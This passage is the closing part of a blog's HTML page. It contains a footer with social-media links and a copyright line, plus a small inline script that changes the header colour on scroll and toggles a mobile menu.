				<li> <a href="http://github.com/cheng-kang" target="_blank"> <img src="/img/GitHub.png"> </a> </li>
				
				
				
				<li> <a href="http://www.weibo.com/progrant" target="_blank"> <img src="/img/Weibo.png"> </a> </li>
				
				
				
				<li> <a href="https://twitter.com/ScotlAnt" target="_blank"> <img src="/img/Twitter.png"> </a> </li>
				
				
				
				
			</ul>
		</div>
		<img src="/img/line.jpg">
		<div class="copyright">
			&copy; 2021 Erotica | Provided By  <a title="吔屎啦你" href="http://chengkang.me/" target="_blank">吔屎啦你</a>
		</div>
	</div>
</footer>
        </div>
        <script type="text/javascript">
        function scrollYListener() {
        var searchHeight = parseInt(getComputedStyle(document.getElementById("Search")).height)
        var width = document.documentElement.clientWidth;
        var supportPageOffset = window.pageXOffset !== undefined;
        var isCSS1Compat = ((document.compatMode || "") === "CSS1Compat");
        var scrollY = supportPageOffset ? window.pageYOffset : isCSS1Compat ? document.documentElement.scrollTop : document.body.scrollTop;
        if (scrollY >= searchHeight-10) {
        document.getElementsByTagName('header')[0].style.backgroundColor = "#cd4b4b";
        document.getElementsByClassName('logo')[0].style.backgroundColor = "#cd4b4b";
        } else {
        document.getElementsByTagName('header')[0].style.backgroundColor = "#4f8e8e";
        document.getElementsByClassName('logo')[0].style.backgroundColor = "#4f8e8e";
        }
        }
        var isMenuExpanded = false;
        document.getElementById("mobile_menu_btn").onclick = function toggleMobileMenu() {
        if (isMenuExpanded) {
        document.getElementsByClassName('slide_menu')[0].className = "slide_menu";
        } else {
        document.getElementsByClassName('slide_menu')[0].className += " mobile_menu_active";
        }
        isMenuExpanded = !isMenuExpanded;
        }
        </script>
        
        
    </body>
</html>